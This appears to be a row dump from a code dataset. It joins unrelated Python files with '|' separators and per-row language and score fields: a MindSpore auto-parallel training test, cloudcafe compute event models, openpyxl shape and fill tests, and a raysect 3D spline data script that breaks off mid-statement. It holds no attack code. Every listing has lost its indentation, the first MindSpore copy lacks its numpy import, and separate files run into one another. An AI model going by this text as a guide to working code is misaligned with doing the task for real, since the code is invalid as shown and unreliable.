import mindspore.nn as nn
from mindspore import Tensor, Parameter
from mindspore import context
from mindspore.common.api import _executor
from mindspore.ops import composite as C
from mindspore.ops import operations as P
from tests.ut.python.ops.test_math_ops import VirtualLoss
grad_all = C.GradOperation(get_all=True)
class NetWithLoss(nn.Cell):
def __init__(self, network):
super(NetWithLoss, self).__init__()
self.loss = VirtualLoss()
self.network = network
def construct(self, x):
predict = self.network(x)
return self.loss(predict)
class GradWrap(nn.Cell):
def __init__(self, network):
super(GradWrap, self).__init__()
self.network = network
def construct(self, x):
return grad_all(self.network)(x)
class CustomDense(nn.Cell):
def __init__(self, row, column):
super(CustomDense, self).__init__()
self.weight = Parameter(Tensor(np.ones([row, column]).astype(np.float32) * 0.01), "w", requires_grad=True)
self.bias = Parameter(Tensor(np.zeros([row, column]).astype(np.float32)), "b", requires_grad=True)
self.matmul1 = P.MatMul()
self.add2 = P.TensorAdd()
self.activation3 = nn.ReLU()
def construct(self, x):
mat_output = self.matmul1(x, self.weight)
add_output = self.add2(mat_output, self.bias)
output = self.activation3(add_output)
return output
class DenseMutMulNet(nn.Cell):
def __init__(self):
super(DenseMutMulNet, self).__init__()
self.fc1 = CustomDense(4096, 4096)
self.fc2 = CustomDense(4096, 4096)
self.fc3 = CustomDense(4096, 4096)
self.fc4 = CustomDense(4096, 4096)
self.relu4 = nn.ReLU()
self.relu5 = nn.ReLU()
self.transpose = P.Transpose()
self.matmul1 = P.MatMul()
self.matmul2 = P.MatMul()
def construct(self, x):
q = self.fc1(x)
k = self.fc2(x)
v = self.fc3(x)
k = self.transpose(k, (1, 0))
c = self.relu4(self.matmul1(q, k))
s = self.relu5(self.matmul2(c, v))
s = self.fc4(s)
return s
class MultiTransformer(nn.Cell):
def __init__(self, layer_nums=1):
super(MultiTransformer, self).__init__()
self.layer = self._make_layer(layer_nums)
def _make_layer(self, layer_num):
layers = []
for _ in range(0, layer_num):
layers.append(DenseMutMulNet())
return nn.SequentialCell(layers)
def construct(self, x):
out = self.layer(x)
return out
def test_dmnet_train_step():
size = 8
context.set_auto_parallel_context(device_num=size, global_rank=0)
input_ = Tensor(np.ones([4096, 4096]).astype(np.float32) * 0.01)
net = GradWrap(NetWithLoss(MultiTransformer()))
context.set_auto_parallel_context(parallel_mode="auto_parallel")
net.set_auto_parallel()
_executor.compile(net, input_)
| # Copyright 2019 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import numpy as np
import mindspore.nn as nn
from mindspore import Tensor, Parameter
from mindspore import context
from mindspore.common.api import _executor
from mindspore.ops import composite as C
from mindspore.ops import operations as P
from tests.ut.python.ops.test_math_ops import VirtualLoss
grad_all = C.GradOperation(get_all=True)
class NetWithLoss(nn.Cell):
def __init__(self, network):
super(NetWithLoss, self).__init__()
self.loss = VirtualLoss()
self.network = network
def construct(self, x):
predict = self.network(x)
return self.loss(predict)
class GradWrap(nn.Cell):
def __init__(self, network):
super(GradWrap, self).__init__()
self.network = network
def construct(self, x):
return grad_all(self.network)(x)
class CustomDense(nn.Cell):
def __init__(self, row, column):
super(CustomDense, self).__init__()
self.weight = Parameter(Tensor(np.ones([row, column]).astype(np.float32) * 0.01), "w", requires_grad=True)
self.bias = Parameter(Tensor(np.zeros([row, column]).astype(np.float32)), "b", requires_grad=True)
self.matmul1 = P.MatMul()
self.add2 = P.TensorAdd()
self.activation3 = nn.ReLU()
def construct(self, x):
mat_output = self.matmul1(x, self.weight)
add_output = self.add2(mat_output, self.bias)
output = self.activation3(add_output)
return output
class DenseMutMulNet(nn.Cell):
def __init__(self):
super(DenseMutMulNet, self).__init__()
self.fc1 = CustomDense(4096, 4096)
self.fc2 = CustomDense(4096, 4096)
self.fc3 = CustomDense(4096, 4096)
self.fc4 = CustomDense(4096, 4096)
self.relu4 = nn.ReLU()
self.relu5 = nn.ReLU()
self.transpose = P.Transpose()
self.matmul1 = P.MatMul()
self.matmul2 = P.MatMul()
def construct(self, x):
q = self.fc1(x)
k = self.fc2(x)
v = self.fc3(x)
k = self.transpose(k, (1, 0))
c = self.relu4(self.matmul1(q, k))
s = self.relu5(self.matmul2(c, v))
s = self.fc4(s)
return s
class MultiTransformer(nn.Cell):
def __init__(self, layer_nums=1):
super(MultiTransformer, self).__init__()
self.layer = self._make_layer(layer_nums)
def _make_layer(self, layer_num):
layers = []
for _ in range(0, layer_num):
layers.append(DenseMutMulNet())
return nn.SequentialCell(layers)
def construct(self, x):
out = self.layer(x)
return out
def test_dmnet_train_step():
size = 8
context.set_auto_parallel_context(device_num=size, global_rank=0)
input_ = Tensor(np.ones([4096, 4096]).astype(np.float32) * 0.01)
net = GradWrap(NetWithLoss(MultiTransformer()))
context.set_auto_parallel_context(parallel_mode="auto_parallel")
net.set_auto_parallel()
_executor.compile(net, input_) | en | 0.847984 | # Copyright 2019 Huawei Technologies Co., Ltd # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. | 1.957826 | 2 |
cloudcafe/compute/events/models/common.py | rcbops-qa/cloudcafe | 0 | 8541 | <reponame>rcbops-qa/cloudcafe
"""
Copyright 2015 Rackspace
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from cloudcafe.compute.events.models.base import (
EventBaseModel, EventBaseListModel)
class Bandwidth(EventBaseModel):
"""Bandwidth Response Model
@summary: Response model for bandwidth from a compute
event notification
@note: Although the 'public' and 'private' interfaces are
not required, they are the most common names, and are
included as optional attributes for the sake of convenience
@note: This type may contain additional unspecified
BandwidthInterface fields, which will be captured in a
dictionary called kwargs
JSON Example:
{
"private": { <BandwidthInterface> },
"public": { <BandwidthInterface> }
}
"""
kwarg_map = {'private': 'private',
'public': 'public'}
optional_kwargs = ['private', 'public']
strict_checking = False
def __init__(self, private=None, public=None, **kwargs):
super(Bandwidth, self).__init__(locals())
@classmethod
def _dict_to_obj(cls, json_dict):
"""Override dict_to_obj implementation"""
obj = cls._map_values_to_kwargs(json_dict)
for key in obj.kwargs:
obj.kwargs[key] = BandwidthInterface._dict_to_obj(obj.kwargs[key])
if obj.private:
obj.private = BandwidthInterface._dict_to_obj(obj.private)
if obj.public:
obj.public = BandwidthInterface._dict_to_obj(obj.public)
return obj
class BandwidthInterface(EventBaseModel):
"""Bandwidth Interface Response Model
@summary: Response model for bandwidth on an interface from
a compute event notification
@note: Sub-model of Bandwidth
JSON Example:
{
"bw_in": 123456,
"bw_out": 654321
}
"""
kwarg_map = {'bw_in': 'bw_in',
'bw_out': 'bw_out'}
def __init__(self, bw_in, bw_out):
super(BandwidthInterface, self).__init__(locals())
class FixedIp(EventBaseModel):
"""Fixed IP Response Model
@summary: Response model for a fixed IP address from a
compute event notification
@note: Represents a single fixed IP
JSON Example:
{
"address": "10.10.0.0",
"floating_ips": [],
"label": "public",
"meta": {},
"type": "fixed",
"version": 4,
"vif_mac": "FE:ED:FA:00:1C:D4"
}
"""
kwarg_map = {
'address': 'address',
'floating_ips': 'floating_ips',
'label': 'label',
'meta': 'meta',
'type_': 'type',
'version': 'version',
'vif_mac': 'vif_mac'}
def __init__(self, address, floating_ips, label, meta, type_, version,
vif_mac):
super(FixedIp, self).__init__(locals())
class FixedIps(EventBaseListModel):
"""Fixed IPs Model
@summary: Response model for a list of fixed IP addresses
from a compute event notification
@note: Returns a list of elements of type 'FixedIp'
JSON Example:
{
"fixed_ips": [
{ <FixedIp> },
{ <FixedIp> }
]
}
"""
list_model_key = 'fixed_ips'
ObjectModel = FixedIp
class ImageMeta(EventBaseModel):
"""Image Metadata Model
@summary: Response model for image metadata from a compute
event notification
@note: This type may contain additional unspecified
fields, which will be captured in a dictionary called kwargs
JSON Example:
{
"image_meta": {
"auto_disk_config": "disabled",
"base_image_ref": "5e91ad7f-afe4-4a83-bd5f-84673462cae1",
"container_format": "ovf",
"disk_format": "vhd",
"image_type": "base",
"min_disk": "20",
"min_ram": "512",
"org.openstack__1__architecture": "x64",
"org.openstack__1__os_distro": "com.ubuntu",
"org.openstack__1__os_version": "12.04",
"os_type": "linux"
}
}
"""
kwarg_map = {
'auto_disk_config': 'auto_disk_config',
'base_image_ref': 'base_image_ref',
'container_format': 'container_format',
'disk_format': 'disk_format',
'image_type': 'image_type',
'min_disk': 'min_disk',
'min_ram': 'min_ram',
'org_openstack__1__architecture': 'org.openstack__1__architecture',
'org_openstack__1__os_distro': 'org.openstack__1__os_distro',
'org_openstack__1__os_version': 'org.openstack__1__os_version',
'os_type': 'os_type'}
strict_checking = False
def __init__(self, auto_disk_config, base_image_ref, container_format,
disk_format, image_type, min_disk, min_ram,
org_openstack__1__architecture, org_openstack__1__os_distro,
org_openstack__1__os_version, os_type, **kwargs):
super(ImageMeta, self).__init__(locals())
class InstanceException(EventBaseModel):
"""Instance Exception Model
@summary: Response model for an instance exception from a
compute event notification
@note: Represents a single instance exception
JSON Example:
{
"exception": {
"kwargs": {
"instance_uuid": "5e91ad7f-afe4-4a83-bd5f-84673462cae1",
"reason": "Something broke",
"code": 500
}
}
}
"""
kwarg_map = {'kwargs': 'kwargs'}
def __init__(self, kwargs):
super(InstanceException, self).__init__(locals())
| """
Copyright 2015 Rackspace
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from cloudcafe.compute.events.models.base import (
EventBaseModel, EventBaseListModel)
class Bandwidth(EventBaseModel):
"""Bandwidth Response Model
@summary: Response model for bandwidth from a compute
event notification
@note: Although the 'public' and 'private' interfaces are
not required, they are the most common names, and are
included as optional attributes for the sake of convenience
@note: This type may contain additional unspecified
BandwidthInterface fields, which will be captured in a
dictionary called kwargs
JSON Example:
{
"private": { <BandwidthInterface> },
"public": { <BandwidthInterface> }
}
"""
kwarg_map = {'private': 'private',
'public': 'public'}
optional_kwargs = ['private', 'public']
strict_checking = False
def __init__(self, private=None, public=None, **kwargs):
super(Bandwidth, self).__init__(locals())
@classmethod
def _dict_to_obj(cls, json_dict):
"""Override dict_to_obj implementation"""
obj = cls._map_values_to_kwargs(json_dict)
for key in obj.kwargs:
obj.kwargs[key] = BandwidthInterface._dict_to_obj(obj.kwargs[key])
if obj.private:
obj.private = BandwidthInterface._dict_to_obj(obj.private)
if obj.public:
obj.public = BandwidthInterface._dict_to_obj(obj.public)
return obj
class BandwidthInterface(EventBaseModel):
"""Bandwidth Interface Response Model
@summary: Response model for bandwidth on an interface from
a compute event notification
@note: Sub-model of Bandwidth
JSON Example:
{
"bw_in": 123456,
"bw_out": 654321
}
"""
kwarg_map = {'bw_in': 'bw_in',
'bw_out': 'bw_out'}
def __init__(self, bw_in, bw_out):
super(BandwidthInterface, self).__init__(locals())
class FixedIp(EventBaseModel):
"""Fixed IP Response Model
@summary: Response model for a fixed IP address from a
compute event notification
@note: Represents a single fixed IP
JSON Example:
{
"address": "10.10.0.0",
"floating_ips": [],
"label": "public",
"meta": {},
"type": "fixed",
"version": 4,
"vif_mac": "FE:ED:FA:00:1C:D4"
}
"""
kwarg_map = {
'address': 'address',
'floating_ips': 'floating_ips',
'label': 'label',
'meta': 'meta',
'type_': 'type',
'version': 'version',
'vif_mac': 'vif_mac'}
def __init__(self, address, floating_ips, label, meta, type_, version,
vif_mac):
super(FixedIp, self).__init__(locals())
class FixedIps(EventBaseListModel):
"""Fixed IPs Model
@summary: Response model for a list of fixed IP addresses
from a compute event notification
@note: Returns a list of elements of type 'FixedIp'
JSON Example:
{
"fixed_ips": [
{ <FixedIp> },
{ <FixedIp> }
]
}
"""
list_model_key = 'fixed_ips'
ObjectModel = FixedIp
class ImageMeta(EventBaseModel):
"""Image Metadata Model
@summary: Response model for image metadata from a compute
event notification
@note: This type may contain additional unspecified
fields, which will be captured in a dictionary called kwargs
JSON Example:
{
"image_meta": {
"auto_disk_config": "disabled",
"base_image_ref": "5e91ad7f-afe4-4a83-bd5f-84673462cae1",
"container_format": "ovf",
"disk_format": "vhd",
"image_type": "base",
"min_disk": "20",
"min_ram": "512",
"org.openstack__1__architecture": "x64",
"org.openstack__1__os_distro": "com.ubuntu",
"org.openstack__1__os_version": "12.04",
"os_type": "linux"
}
}
"""
kwarg_map = {
'auto_disk_config': 'auto_disk_config',
'base_image_ref': 'base_image_ref',
'container_format': 'container_format',
'disk_format': 'disk_format',
'image_type': 'image_type',
'min_disk': 'min_disk',
'min_ram': 'min_ram',
'org_openstack__1__architecture': 'org.openstack__1__architecture',
'org_openstack__1__os_distro': 'org.openstack__1__os_distro',
'org_openstack__1__os_version': 'org.openstack__1__os_version',
'os_type': 'os_type'}
strict_checking = False
def __init__(self, auto_disk_config, base_image_ref, container_format,
disk_format, image_type, min_disk, min_ram,
org_openstack__1__architecture, org_openstack__1__os_distro,
org_openstack__1__os_version, os_type, **kwargs):
super(ImageMeta, self).__init__(locals())
class InstanceException(EventBaseModel):
"""Instance Exception Model
@summary: Response model for an instance exception from a
compute event notification
@note: Represents a single instance exception
JSON Example:
{
"exception": {
"kwargs": {
"instance_uuid": "5e91ad7f-afe4-4a83-bd5f-84673462cae1",
"reason": "Something broke",
"code": 500
}
}
}
"""
kwarg_map = {'kwargs': 'kwargs'}
def __init__(self, kwargs):
super(InstanceException, self).__init__(locals()) | en | 0.728559 | Copyright 2015 Rackspace Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. Bandwidth Response Model @summary: Response model for bandwidth from a compute event notification @note: Although the 'public' and 'private' interfaces are not required, they are the most common names, and are included as optional attributes for the sake of convenience @note: This type may contain additional unspecified BandwidthInterface fields, which will be captured in a dictionary called kwargs JSON Example: { "private": { <BandwidthInterface> }, "public": { <BandwidthInterface> } } Override dict_to_obj implementation Bandwidth Interface Response Model @summary: Response model for bandwidth on an interface from a compute event notification @note: Sub-model of Bandwidth JSON Example: { "bw_in": 123456, "bw_out": 654321 } Fixed IP Response Model @summary: Response model for a fixed IP address from a compute event notification @note: Represents a single fixed IP JSON Example: { "address": "10.10.0.0", "floating_ips": [], "label": "public", "meta": {}, "type": "fixed", "version": 4, "vif_mac": "FE:ED:FA:00:1C:D4" } Fixed IPs Model @summary: Response model for a list of fixed IP addresses from a compute event notification @note: Returns a list of elements of type 'FixedIp' JSON Example: { "fixed_ips": [ { <FixedIp> }, { <FixedIp> } ] } Image Metadata Model @summary: Response model for image metadata from a compute event notification @note: This type may contain additional unspecified fields, which will be captured in a dictionary called kwargs JSON Example: { "image_meta": { "auto_disk_config": "disabled", "base_image_ref": "5e91ad7f-afe4-4a83-bd5f-84673462cae1", "container_format": "ovf", "disk_format": "vhd", "image_type": "base", "min_disk": "20", "min_ram": "512", "org.openstack__1__architecture": "x64", "org.openstack__1__os_distro": "com.ubuntu", "org.openstack__1__os_version": "12.04", "os_type": "linux" } } Instance Exception Model @summary: Response model for an instance exception from a compute event notification @note: Represents a single instance exception JSON Example: { "exception": { "kwargs": { "instance_uuid": "5e91ad7f-afe4-4a83-bd5f-84673462cae1", "reason": "Something broke", "code": 500 } } } | 1.988386 | 2 |
openpyxl/drawing/tests/test_shapes.py | sekcheong/openpyxl | 0 | 8542 | from __future__ import absolute_import
# Copyright (c) 2010-2017 openpyxl
import pytest
from openpyxl.xml.functions import fromstring, tostring
from openpyxl.tests.helper import compare_xml
@pytest.fixture
def GradientFillProperties():
from ..fill import GradientFillProperties
return GradientFillProperties
class TestGradientFillProperties:
def test_ctor(self, GradientFillProperties):
fill = GradientFillProperties()
xml = tostring(fill.to_tree())
expected = """
<gradFill></gradFill>
"""
diff = compare_xml(xml, expected)
assert diff is None, diff
def test_from_xml(self, GradientFillProperties):
src = """
<gradFill></gradFill>
"""
node = fromstring(src)
fill = GradientFillProperties.from_tree(node)
assert fill == GradientFillProperties()
@pytest.fixture
def Transform2D():
from ..shapes import Transform2D
return Transform2D
class TestTransform2D:
def test_ctor(self, Transform2D):
shapes = Transform2D()
xml = tostring(shapes.to_tree())
expected = """
<xfrm></xfrm>
"""
diff = compare_xml(xml, expected)
assert diff is None, diff
def test_from_xml(self, Transform2D):
src = """
<root />
"""
node = fromstring(src)
shapes = Transform2D.from_tree(node)
assert shapes == Transform2D()
| from __future__ import absolute_import
# Copyright (c) 2010-2017 openpyxl
import pytest
from openpyxl.xml.functions import fromstring, tostring
from openpyxl.tests.helper import compare_xml
@pytest.fixture
def GradientFillProperties():
from ..fill import GradientFillProperties
return GradientFillProperties
class TestGradientFillProperties:
def test_ctor(self, GradientFillProperties):
fill = GradientFillProperties()
xml = tostring(fill.to_tree())
expected = """
<gradFill></gradFill>
"""
diff = compare_xml(xml, expected)
assert diff is None, diff
def test_from_xml(self, GradientFillProperties):
src = """
<gradFill></gradFill>
"""
node = fromstring(src)
fill = GradientFillProperties.from_tree(node)
assert fill == GradientFillProperties()
@pytest.fixture
def Transform2D():
from ..shapes import Transform2D
return Transform2D
class TestTransform2D:
def test_ctor(self, Transform2D):
shapes = Transform2D()
xml = tostring(shapes.to_tree())
expected = """
<xfrm></xfrm>
"""
diff = compare_xml(xml, expected)
assert diff is None, diff
def test_from_xml(self, Transform2D):
src = """
<root />
"""
node = fromstring(src)
shapes = Transform2D.from_tree(node)
assert shapes == Transform2D()
| en | 0.189038 | # Copyright (c) 2010-2017 openpyxl <gradFill></gradFill> <gradFill></gradFill> <xfrm></xfrm> <root /> | 2.387977 | 2 |
raysect/core/math/function/float/function3d/interpolate/tests/scripts/generate_3d_splines.py | raysect/source | 71 | 8543 | <filename>raysect/core/math/function/float/function3d/interpolate/tests/scripts/generate_3d_splines.py
# Copyright (c) 2014-2021, Dr <NAME>, Raysect Project
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# 3. Neither the name of the Raysect Project nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
import numpy as np
from raysect.core.math.function.float.function3d.interpolate.interpolator3darray import Interpolator3DArray
from matplotlib.colors import SymLogNorm, Normalize
import scipy
import sys
from raysect.core.math.function.float.function3d.interpolate.tests.data.interpolator3d_test_data import \
TestInterpolatorLoadBigValues, TestInterpolatorLoadNormalValues, TestInterpolatorLoadSmallValues,\
TestInterpolatorLoadBigValuesUneven, TestInterpolatorLoadNormalValuesUneven, TestInterpolatorLoadSmallValuesUneven
from raysect.core.math.function.float.function3d.interpolate.tests.test_interpolator_3d import X_LOWER, X_UPPER,\
NB_XSAMPLES, NB_X, X_EXTRAP_DELTA_MAX, PRECISION, Y_LOWER, Y_UPPER, NB_YSAMPLES, NB_Y, \
Y_EXTRAP_DELTA_MAX, EXTRAPOLATION_RANGE, large_extrapolation_range, Z_LOWER, Z_UPPER, \
NB_ZSAMPLES, NB_Z, Z_EXTRAP_DELTA_MAX, N_EXTRAPOLATION, uneven_linspace
# Force scientific format to get the right number of significant figures
np.set_printoptions(30000, linewidth=100, formatter={'float': lambda x_str: format(x_str, '.'+str(PRECISION)+'E')},
threshold=sys.maxsize)
# Overwrite imported values here.
VISUAL_NOT_TESTS = False
if VISUAL_NOT_TESTS:
NB_X = 51
NB_Y = 51
NB_Z = 51
NB_XSAMPLES = 101
NB_YSAMPLES = 101
NB_ZSAMPLES = 101
X_EXTRAP_DELTA_MIN = 0.04
Y_EXTRAP_DELTA_MIN = 0.04
Z_EXTRAP_DELTA_MIN = 0.04
BIG_VALUE_FACTOR = 20.
SMALL_VALUE_FACTOR = -20.
def docstring_test():
"""
.. code-block:: python
>>> from raysect.core.math.function.float.function3d.interpolate.interpolator3darray import Interpolator3DArray
>>>
>>> x = np.linspace(-1., 1., 20)
>>> y = np.linspace(-1., 1., 20)
>>> z = np.linspace(-1., 1., 20)
>>> x_array, y_array, z_array = np.meshgrid(x, y, z, indexing='ij')
>>> f = np.exp(-(x_array**2 + y_array**2 + z_array**2))
>>> interpolator3D = Interpolator3DArray(x, y, z, f, 'cubic', 'nearest', 1.0, 1.0, 1.0)
>>> # Interpolation
>>> interpolator3D(1.0, 1.0, 0.2)
0.1300281183136766
>>> # Extrapolation
>>> interpolator3D(1.0, 1.0, 1.1)
0.0497870683678659
>>> # Extrapolation out of bounds
>>> interpolator3D(1.0, 1.0, 2.1)
ValueError: The specified value (z=2.1) is outside of extrapolation range.
"""
pass
def get_extrapolation_input_values(
x_lower, x_upper, y_lower, y_upper, z_lower, z_upper, x_extrap_delta_max, y_extrap_delta_max,
z_extrap_delta_max, x_extrap_delta_min, y_extrap_delta_min, z_extrap_delta_min):
xsamples_extrap_out_of_bounds_options = np.array(
[x_lower - x_extrap_delta_max, (x_lower + x_upper) / 2., x_upper + x_extrap_delta_max])
ysamples_extrap_out_of_bounds_options = np.array(
[y_lower - y_extrap_delta_max, (y_lower + y_upper) / 2., y_upper + y_extrap_delta_max])
zsamples_extrap_out_of_bounds_options = np.array(
[z_lower - z_extrap_delta_max, (z_lower + z_upper) / 2., z_upper + z_extrap_delta_max])
xsamples_extrap_in_bounds_options = np.array(
[x_lower - x_extrap_delta_min, (x_lower + x_upper) / 2., x_upper + x_extrap_delta_min])
ysamples_extrap_in_bounds_options = np.array(
[y_lower - y_extrap_delta_min, (y_lower + y_upper) / 2., y_upper + y_extrap_delta_min])
zsamples_extrap_in_bounds_options = np.array(
[z_lower - z_extrap_delta_min, (z_lower + z_upper) / 2., z_upper + z_extrap_delta_min])
xsamples_extrap_out_of_bounds = []
ysamples_extrap_out_of_bounds = []
zsamples_extrap_out_of_bounds = []
xsamples_extrap_in_bounds = []
ysamples_extrap_in_bounds = []
zsamples_extrap_in_bounds = []
edge_indicies_x = [0, len(xsamples_extrap_out_of_bounds_options) - 1]
edge_indicies_y = [0, len(ysamples_extrap_out_of_bounds_options) - 1]
edge_indicies_z = [0, len(zsamples_extrap_out_of_bounds_options) - 1]
for i_x in range(len(xsamples_extrap_out_of_bounds_options)):
for j_y in range(len(ysamples_extrap_out_of_bounds_options)):
for k_z in range(len(zsamples_extrap_out_of_bounds_options)):
if not (i_x not in edge_indicies_x and j_y not in edge_indicies_y and k_z not in edge_indicies_z):
xsamples_extrap_out_of_bounds.append(xsamples_extrap_out_of_bounds_options[i_x])
ysamples_extrap_out_of_bounds.append(ysamples_extrap_out_of_bounds_options[j_y])
zsamples_extrap_out_of_bounds.append(zsamples_extrap_out_of_bounds_options[k_z])
xsamples_extrap_in_bounds.append(xsamples_extrap_in_bounds_options[i_x])
ysamples_extrap_in_bounds.append(ysamples_extrap_in_bounds_options[j_y])
zsamples_extrap_in_bounds.append(zsamples_extrap_in_bounds_options[k_z])
return \
np.array(xsamples_extrap_out_of_bounds), np.array(ysamples_extrap_out_of_bounds), \
np.array(zsamples_extrap_out_of_bounds), np.array(xsamples_extrap_in_bounds), \
np.array(ysamples_extrap_in_bounds), np.array(zsamples_extrap_in_bounds)
def pcolourmesh_corners(input_array):
return np.concatenate((input_array[:-1] - np.diff(input_array)/2.,
np.array([input_array[-1] - (input_array[-1] - input_array[-2]) / 2.,
input_array[-1] + (input_array[-1] - input_array[-2]) / 2.])), axis=0)
def function_to_spline(x_input, y_input, z_input, factor_in):
t = np.pi * np.sqrt((x_input ** 2 + y_input ** 2 + z_input ** 2))
return factor_in*np.sinc(t)
if __name__ == '__main__':
# Calculate for big values, small values, or normal values
big_values = False
small_values = True
log_scale = False
uneven_spacing = False
use_saved_datastore_spline_knots = True
verbose_options = [False, True, False, False]
if VISUAL_NOT_TESTS:
index_x_in = 40
else:
index_x_in = 4
index_y_in = 0
index_z_in = 0
index_y_plot = 0
index_z_plot = 0
print('Using scipy version', scipy.__version__)
# Find the function values to be used
if big_values:
factor = np.power(10., BIG_VALUE_FACTOR)
elif small_values:
factor = np.power(10., SMALL_VALUE_FACTOR)
else:
factor = 1.
if uneven_spacing:
x_in = uneven_linspace(X_LOWER, X_UPPER, NB_X, offset_fraction=1./3.)
y_in = uneven_linspace(Y_LOWER, Y_UPPER, NB_Y, offset_fraction=1./3.)
z_in = uneven_linspace(Z_LOWER, Z_UPPER, NB_Z, offset_fraction=1./3.)
else:
x_in = np.linspace(X_LOWER, X_UPPER, NB_X)
y_in = np.linspace(Y_LOWER, Y_UPPER, NB_Y)
z_in = np.linspace(Z_LOWER, Z_UPPER, NB_Z)
x_in_full, y_in_full, z_in_full = np.meshgrid(x_in, y_in, z_in, indexing='ij')
f_in = function_to_spline(x_in_full, y_in_full, z_in_full, factor)
if use_saved_datastore_spline_knots:
if uneven_spacing:
if big_values:
reference_loaded_values = TestInterpolatorLoadBigValuesUneven()
elif small_values:
reference_loaded_values = TestInterpolatorLoadSmallValuesUneven()
else:
reference_loaded_values = TestInterpolatorLoadNormalValuesUneven()
else:
if big_values:
reference_loaded_values = TestInterpolatorLoadBigValues()
elif small_values:
reference_loaded_values = TestInterpolatorLoadSmallValues()
else:
reference_loaded_values = TestInterpolatorLoadNormalValues()
f_in = reference_loaded_values.data
if verbose_options[0]:
print('Save this to self.data in test_interpolator:\n', repr(f_in))
xsamples = np.linspace(X_LOWER, X_UPPER, NB_XSAMPLES)
ysamples = np.linspace(Y_LOWER, Y_UPPER, NB_YSAMPLES)
zsamples = np.linspace(Z_LOWER, Z_UPPER, NB_ZSAMPLES)
xsamples_extrapolation, ysamples_extrapolation, zsamples_extrapolation = large_extrapolation_range(
xsamples, ysamples, zsamples, EXTRAPOLATION_RANGE, N_EXTRAPOLATION
)
# # Extrapolation x and y values
xsamples_out_of_bounds, ysamples_out_of_bounds, zsamples_out_of_bounds, xsamples_in_bounds, ysamples_in_bounds, \
zsamples_in_bounds = get_extrapolation_input_values(
X_LOWER, X_UPPER, Y_LOWER, Y_UPPER, Z_LOWER, Z_UPPER, X_EXTRAP_DELTA_MAX, Y_EXTRAP_DELTA_MAX,
Z_EXTRAP_DELTA_MAX, X_EXTRAP_DELTA_MIN, Y_EXTRAP_DELTA_MIN, Z_EXTRAP_DELTA_MIN
)
interpolator3D = Interpolator3DArray(x_in, y_in, z_in, f_in, 'linear', 'linear', extrapolation_range_x=2.0,
extrapolation_range_y=2.0, extrapolation_range_z=2.0)
if VISUAL_NOT_TESTS:
n_lower_upper_interp = 51
else:
n_lower_upper_interp = 19
n_lower = 50
lower_p = 0.9
xsamples_lower_and_upper = np.linspace(X_LOWER, X_UPPER, n_lower_upper_interp)
ysamples_lower_and_upper = np.linspace(Y_LOWER, Y_UPPER, n_lower_upper_interp)
zsamples_lower_and_upper = np.linspace(Z_LOWER, Z_UPPER, n_lower_upper_interp)
xsamples_lower_and_upper = np.concatenate((np.linspace(X_LOWER - (X_UPPER - X_LOWER) * lower_p, X_LOWER, n_lower)[
:-1], xsamples_lower_and_upper,
np.linspace(X_UPPER, X_UPPER + (X_UPPER - X_LOWER) * lower_p, n_lower)[
1:]))
ysamples_lower_and_upper = np.concatenate((np.linspace(Y_LOWER - (Y_UPPER - Y_LOWER) * lower_p, Y_LOWER, n_lower)[
:-1], ysamples_lower_and_upper,
np.linspace(Y_UPPER, Y_UPPER + (Y_UPPER - Y_LOWER) * lower_p, n_lower)[
1:]))
